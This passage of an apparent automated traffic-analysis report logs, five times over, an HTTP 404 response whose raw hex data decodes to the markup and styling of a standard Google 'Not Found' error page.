64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
